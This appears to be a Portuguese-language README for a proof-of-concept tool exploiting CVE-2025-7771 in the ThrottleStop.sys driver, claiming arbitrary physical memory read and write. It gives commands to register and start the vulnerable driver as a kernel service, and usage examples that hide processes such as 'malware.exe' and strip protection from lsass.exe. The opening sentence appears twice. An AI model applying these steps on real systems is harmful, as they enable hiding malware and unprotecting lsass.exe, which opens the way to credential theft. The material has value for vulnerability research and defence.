
Um PoC simples demonstrando a vulnerabilidade no driver ThrottleStop.sys, exibindo capacidades de leitura e escrita arbitrárias de memória física, bem como tradução de endereço virtual para físico usando Superfetch.
Um PoC simples demonstrando a vulnerabilidade no driver ThrottleStop.sys, exibindo capacidades de leitura e escrita arbitrárias na memória física, bem como tradução de endereço virtual para físico usando Superfetch.
Inicie cmd.exe com privilégios de Administrador e registre um serviço de driver kernel com o tipo 'kernel' e binPath apontando para a localização do driver vulnerável.
> sc create ThrottleStop binPath= <path> type= kernel`
> sc start ThrottleStop
Comandos:
--protect : Proteger um processo.
--unprotect : Desproteger um processo protegido.
--hide : Ocultar um processo.
--unhide : Mostrar um processo.
--help : Exibir ajuda
Exemplos:
CVE-2025-7771.exe --protect notepad.exe ou CVE-2025-7771.exe --protect 12345
CVE-2025-7771.exe --unprotect lsass.exe ou CVE-2025-7771.exe --unprotect 12345
CVE-2025-7771.exe --hide malware.exe ou CVE-2025-7771.exe --hide 12345
Para mostrar um processo oculto, você pode usar o comando --unhide especificando o endereço eprocess do processo oculto com '--eprocess':
CVE-2025-7771.exe --unhide --eprocess 0xffffc207da1d9240
Você é responsável por garantir que possui a devida autorização antes de usar esta ferramenta. O autor não assume nenhuma responsabilidade pelo uso indevido.
Este é um projeto em andamento, contribuições e sugestões são bem-vindas! Se você tiver ideias, melhorias ou quiser colaborar, sinta-se à vontade para entrar em contato em: [email protected]